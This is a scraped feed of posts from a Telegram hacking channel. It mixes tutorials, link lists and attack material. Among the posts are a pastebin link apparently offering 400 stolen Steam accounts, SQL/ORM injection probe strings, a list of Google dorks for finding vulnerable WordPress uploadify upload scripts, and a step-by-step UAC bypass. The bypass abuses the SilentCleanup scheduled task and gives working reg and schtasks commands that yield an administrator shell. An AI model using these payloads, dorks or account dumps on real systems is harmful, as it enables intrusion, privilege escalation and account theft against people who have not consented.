UNDERCODE COMMUNITY
2.66K subscribers
1.23K photos
31 videos
2.65K files
79.1K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
πŸ¦‘ Lastest Helpfull tutorials pdfs (beginers & experts )
X 400 STEAM ACCOUNTS WITH GAMES :

Not cracked by undercode
pastebin.com/HS9VrWxf
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘403 Forbidden Error Variations :

Like many other HTTP status codes, there are a lot of different variations for how this error code presents itself.

Here are some common variations that you might come across:

1οΈβƒ£β€œForbidden – You don’t have permission to access / on this server”

2️⃣ β€œ403 – Forbidden: Access is denied”

3οΈβƒ£β€œ403 – Forbidden Error – You are not allowed to access this address”

4οΈβƒ£β€œ403 Forbidden – nginx” (host)

5οΈβƒ£β€œHTTP Error 403 – Forbidden – You do not have permission to access the document or program you requested”

6οΈβƒ£β€œ403 Forbidden – Access to this resource on the server is denied”

7οΈβƒ£β€œ403. That’s an error. Your client does not have permission to get URL / from this server”

8οΈβƒ£β€œYou are not authorized to view this page”

8οΈβƒ£β€œIt appears you don’t have permission to access this page.”
If you’re on an Nginx server, it will look like this below. Basically, if you see any mention of β€œforbidden” or β€œnot allowed to access”, you’re probably dealing with a 403 Forbidden error.

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Dns spy 2020 updated -Reverse engeneer :

Too much features :

1) Debug
.NET Framework, .NET Core and Unity game assemblies, no source code required

2) Set breakpoints and step into any assembly
Locals, watch, autos windows

3) Variables windows support saving variables (eg. decrypted byte arrays) to disk or view them in the hex editor (memory window)

4) Object IDs

5) Multiple processes can be debugged at the same time

6) Break on module load

7) Tracepoints and conditional breakpoints

8) Export/import breakpoints and tracepoints

9) Call stack, threads, modules, processes windows

10) Break on thrown exceptions (1st chance)

11) Variables windows support evaluating C# / Visual Basic expressions

12) Dynamic modules can be debugged (but not dynamic methods due to CLR limitations)

13) Output window logs various debugging events, and it shows timestamps by default :)

14) Assemblies that decrypt themselves at runtime can be debugged, dnSpy will use the in-memory image. You can also force dnSpy to always use in-memory images instead of disk files.

15) Public API, you can write an extension or use the C# Interactive window to control the debugger

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1️⃣git clone --recursive https://github.com/0xd4d/dnSpy.git

2️⃣cd dnSpy
# or dotnet build

3️⃣./build.ps1 -NoMsbuild

βœ… git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘#Popular Testing Methodes & tools 2020 for apps-servers :


#Javascript Tools

* [Retire.js](https://retirejs.github.io/retire.js)

#Popular Commercial Tools

* [Qualys Web Scanning](https://www.qualys.com/apps/web-app-scanning/)
* [IBM Security AppScan](https://www.ibm.com/security/application-security/appscan)

#XSS - Cross-Site Scripting

- [Cross-Site Scripting Γ’β‚¬β€œ Application Security Γ’β‚¬β€œ Google](https://www.google.com/intl/sw/about/appsecurity/learning/xss/) - Introduction to XSS by [Google](https://www.google.com/).

- [H5SC](https://github.com/cure53/H5SC) - HTML5 Security Cheatsheet - Collection of HTML5 related XSS attack vectors by [@cure53](https://github.com/cure53).

- [XSS.png](https://github.com/jackmasa/XSS.png) - XSS mind map by [@jackmasa](https://github.com/jackmasa).

- [EXCESS-XSS Guide](https://excess-xss.com/) - Comprehensive tutorial on cross-site scripting by [@JakobKallin](https://github.com/JakobKallin) and [Irene Lobo Valbuena](https://www.linkedin.com/in/irenelobovalbuena/).

βœ… git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘#SQL Injection for beginers best 2020 resources :

- [SQL Injection Cheat Sheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/) - Written by [@netsparker](https://twitter.com/netsparker).

- [SQL Injection Wiki](https://sqlwiki.netspi.com/) - Written by [NETSPI](https://www.netspi.com/).

- [SQL Injection Pocket Reference](https://websec.ca/kb/sql_injection) -

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘#ORM Injection best 2020 Learning free practical resources :

- [HQL for pentesters](http://blog.h3xstream.com/2014/02/hql-for-pentesters.html) -

- [HQL : Hyperinsane Query Language (or how to access the whole SQL API within a HQL injection ?)](https://www.synacktiv.com/ressources/hql2sql_sstic_2015_en.pdf) - Written by [@_m0bius](https://twitter.com/_m0bius).

- [ORM2Pwn: Exploiting injections in Hibernate ORM](https://www.slideshare.net/0ang3el/orm2pwn-exploiting-injections-in-hibernate-orm)

- [ORM Injection](https://www.slideshare.net/simone.onofri/orm-injection)


@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ iο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ How Install any Game Hack .deb file On Jailbroken ios ?

STEP 1: Download the .deb Cydia hack file- or get from ios resources

STEP 2: Copy the file over to your iDevice using any of the file managers mentioned above or skip this step if you're downloading from your iDevice.

STEP 3: Using iFile or Filza, browse to where you saved the downloaded .deb file and tap on it.

STEP 4: Once you tap on the file, you will then need to press on 'Installer' or 'Install' from the options on your screen.

STEP 5: Let iFile / Filza finish the cheat installation. Make sure it successfully installs, otherwise see the note below.

STEP 6: Now open your iDevice settings and scroll down until you see the settings for this cheat and tap on it. If the hack is a Mod Menu, the cheat features can be toggled in-game.

STEP 7: Turn on the features you want and play the game. You may need to follow further instructions inside the hack's popup in-game.

STEP 8: required for some games to restart and idevice

@iUndercode
▁ β–‚ β–„ iο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘WHAT IS ORM INJECTIONS & How & Why to USE ?

1️⃣ Object Relational Mapping (ORM) Injection is an attack using SQL Injection against an ORM generated data access object model. ... ORM generated objects can use SQL or in some cases, a variant of SQL, to perform CRUD (Create, Read, Update, Delete) operations on a database

2️⃣ How to Test ?

> ORM layers can be prone to vulnerabilities, as they extend the surface of attack. Instead of directly targeting the application with SQL queries, you’d be focusing on abusing the ORM layer to send malicious SQL queries.

3️⃣ Identify the ORM Layer :

> To effeciently test and understand what’s happening between your requests and the backend queries, and as with everything related to conducting proper testing, it is essential to identify the technology being used. By following the information gathering chapter, you should be aware of the technology being used by the application at hand. Check this list mapping languages to their respective ORMs.

4️⃣ Abusing the ORM Layer

After identifying the possible ORM being used, it becomes essential to understand how its parser is functioning, and study methods to abuse it, or even maybe if the application is using an old version, identify CVEs pertaining to the library being used. Sometimes, ORM layers are not properly implemented, and thus allow for the tester to conduct normal SQL Injection, without worrying about the ORM layer.

5️⃣Weak ORM Implementation :

1) A vulnerable scenario where the ORM layer was not implemented properly, taken from SANS:

> List results = session.createQuery("from Orders as orders where orders.id = " + currentOrder.getId()).list();
List results = session.createSQLQuery("Select * from Books where author = " + book.getAuthor()).list();
The above didn’t implement the positional parameter, which allows the developer to replace the input with a ?. An example would be as such:

2) Query hqlQuery = session.createQuery("from Orders as orders where orders.id = ?");
List results = hqlQuery.setString(0, "123-ADB-567-QTWYTFDL").list(); // 0 is the first position, where it is dynamically replaced by the string set
This implementation leaves the validation and sanitization to be done by the ORM layer, and the only way to bypass it would be by identifying an issue with the ORM layer.

Powered by wiki
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Vulnerable ORM Layer

 "ORM layers are code, third-party libraries most of the time. They can be vulnerable just like any other piece of code. One example could be the sequelize ORM npm library which was found to be vulnerable in 2019. In another research done by RIPS Tech, bypasses were identified in the hibernate ORM used by Java.> 
wiki
 

πŸ¦‘A cheat sheet that could allow the tester to identify issues could be outlined as follows:


1️⃣MySQL abc\' INTO OUTFILE --

2️⃣PostgreSQL $$='$$=chr(61)||chr(0x27) and 1=pg_sleep(2)||version()'

3️⃣Oracle NVL(TO_CHAR(DBMS_XMLGEN.getxml('select 1 where 1337>1')),'1')!='1'

4️⃣MS SQL 1<LEN(%C2%A0(select%C2%A0top%C2%A01%C2%A0name%C2%A0from%C2%A0users)

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Wordpress uploadify Dorks Priv8 ☠️:

inurl:/wp-content/plugins/chillybin-competition/js/uploadify/uploadify.php
inurl:/wp-content/plugins/comments_plugin/uploadify/uploadify.php
inurl:/wp-content/plugins/wp-crm/third-party/uploadify/uploadify.php
inurl:/wp-content/plugins/doptg/libraries/php/uploadify.php
inurl:/wp-content/plugins/pods/js/uploadify.php
inurl:/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
inurl:/wp-content/plugins/qr-color-code-generator-basic/QR-Color-Code-Generator/uploadify/uploadify.php
inurl:/wp-content/plugins/wp-symposium/uploadify/uploadify.php
inurl:/wp-content/plugins/uploader/uploadify.php
inurl:/wp-content/plugins/1-flash-gallery/upload.php
inurl:/wp-content/themes/zcool-like/uploadify.php
inurl:/third-party/uploadify/uploadify.php
inurl:/lib/uploadify/custom.php
inurl:/wp-content/plugins/html5avmanager/lib/uploadify/custom.php
inurl:/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
inurl:/wp-content/plugins/squace-mobile-publishing-plugin-for-*********/uploadify.php
inurl:/wp-content/plugins/1-flash-gallery/js/uploadify/uploadify.php
inurl:/wp-content/themes/aim-theme/lib/js/old/uploadify.php
inurl:/wp-content/plugins/uploadify/includes/process_upload.php
inurl:/wp-content/plugins/very-simple-post-images/uploadify/uploadify.php
inurl:/wp-content/themes/pronto/cjl/pronto/uploadify/check.php
inurl:/wp-content/plugins/annonces/includes/lib/uploadify/uploadify.php
inurl:/wp-content/plugins/apptivo-business-site/inc/jobs/files/uploadify/uploadify.php
inurl:/wp-content/plugins/bulletproof-security/admin/uploadify/uploadify.php

βœ… darkwiki sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Exploiting Environment Variables in Scheduled Tasks for UAC Bypass
The Windows Task Scheduler

ADVANTAGES
:

1️⃣this a great place to go and find privilege escalations, it's typically abused to add SUID style capabilities to Windows in a nice easy to misunderstand package.

2️⃣It can execute programs as LocalSystem, it can auto-elevate applications for UAC, it can even host arbitrary COM objects.

3️⃣All in all it's a mess, which is why finding bugs in the scheduler itself or in the tasks isn't especially difficult. For example here's a few I've found before. This short blog is about a quick and dirty UAC bypass I discovered which works silently even with UAC is set to the highest prompt level and can be executed without dropping any files (other that a registry key) to disk.

πŸ¦‘ Let's dump some of the task's properties using Powershell to find out.
1) We can see the Principal property, which determines what account the task runs as and the Actions property which determines what to run. I


2) n the Principal property we can see the Group to run as is Authenticated Users which really means it will run as the logged on user starting the task. We also see the RunLevel is set to Highest which means the Task Scheduler will try and elevate the task to administrator without any prompting.


3) Now look at the actions, it's specifying a path, but notice something interesting? It's using an environment variable as part of the path, and in UAC scenarios these can be influenced by a normal user by writing to the registry key


> HKEY_CURRENT_USER\Enviroment and specifying a REG_SZ value.

4) So stop beating around the bush, let's try and exploit it. I dropped a simple executable to c:\dummy\system32\cleanmgr.exe, set the windir environment variable to


> c:\dummy and started the scheduled task


5) immediately get administrator privileges. So let's automate the process, I'll use everyone's favourite language, BATCH as we can use the reg and schtasks commands to do all the work we need. Also as we don't want to drop a file to disk we can abuse the fact that the executable path isn't quoted by the Task Scheduler, meaning we can inject arbitrary command line arguments and just run a simple CMD shell.

> reg add hkcu\Environment /v windir /d "cmd /K reg delete hkcu\Environment /v windir /f && REM "
schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
6) The BATCH file first sets the windir environment variable to "cmd /K" with a following script which deletes the original windir enviroment variable then uses REM to comment the rest of the line out.

7) Executing this on Windows 10 Anniversary Edition and above as a split token admin will get you a shell running as an administrator. I've not tested it on any earlier versions of Windows so YMMV.


8) didn't send this to MSRC but through a friend confirmed that it should already be fixed in a coming version of RS3, so it really looks like MS are serious about trying to lock UAC back down, at least as far as it can be

9) If you want to mitigate now you should be able to reconfigure the task to not use environment variables using the following Powershell script run as administrator (doing this using the UAC bypass is left as an exercise for reader).

$action = New-ScheduledTaskAction -Execute $env:windir\System32\cleanmgr.exe -Argument "/autoclean /d $env:systemdrive"
Set-ScheduledTask SilentCleanup -TaskPath \Microsoft\Windows\DiskCleanup -Action $action


10) If you want to find other potential candidates the following Powershell script will find all tasks with
executable actions which will auto elevate. On my system there are 4 separate tasks, but only one (the SilentCleanup task) can be executed as a normal user, so the rest are not exploitable. Good thing I guess.

> $tasks = Get-ScheduledTask |
Where-Object { $_.Principal.RunLevel -ne "Limited" -and
$_.Principal.LogonType -ne "ServiceAccount" -and
$_.State -ne "Disabled" -and
$_.Actions[0].CimClass.CimClassName -eq "MSFT_TaskExecAction" }

powered by wikisources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Exploiting Environment Variables in Scheduled Tasks for UAC Bypass the Windows Task Scheduler full guide